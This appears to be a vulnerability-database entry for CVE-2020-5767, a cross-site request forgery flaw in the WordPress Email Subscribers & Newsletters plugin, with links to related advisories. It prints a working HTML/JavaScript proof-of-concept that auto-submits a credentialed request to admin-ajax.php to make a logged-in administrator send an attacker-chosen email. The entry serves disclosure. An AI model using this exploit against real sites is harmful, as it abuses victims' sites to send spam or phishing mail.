Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email() vulnerabilit
Reporter | Title | Published | Views | Family All 8 |
---|---|---|---|---|
Cvelist | CVE-2020-5767 | 17 Jul 202021:22 | – | cvelist |
Patchstack | WordPress Email Subscribers & Newsletters plugin <= 4.5.0.1 - Cross-Site Request Forgery (CSRF) vulnerability | 17 Jul 202000:00 | – | patchstack |
Prion | Cross site request forgery (csrf) | 17 Jul 202022:15 | – | prion |
CVE | CVE-2020-5767 | 17 Jul 202022:15 | – | cve |
WPVulnDB | Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email() | 18 Jul 202000:00 | – | wpvulndb |
NVD | CVE-2020-5767 | 17 Jul 202022:15 | – | nvd |
OpenVAS | WordPress Email Subscribers Plugin < 4.5.1 Multiple Vulnerabilities | 21 Jul 202000:00 | – | openvas |
Tenable Nessus | WordPress Plugin 'Email Subscribers & Newsletters' Multiple Vulnerabilities | 27 Aug 202000:00 | – | nessus |
Source | Link |
---|---|
tenable | www.tenable.com/security/research/tra-2020-44-0 |
<!DOCTYPE html>
<html>
<body onload=run()>
<script>
function run() {
var targetUrl = "http://example.com/webpage";
var email = "[email protected]";
var subject = "PoC";
var content = "add content here";
var xhttp = new XMLHttpRequest();
var data = "es_test_email=" + email + "&subject=" + subject +"&content=" + content + "&action=es_send_test_email";
var url = targetUrl + "/wp-admin/admin-ajax.php?";
var method = "POST";
xhttp.open(method, url);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = true;
xhttp.send(data); }
</script>
</body>
</html>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo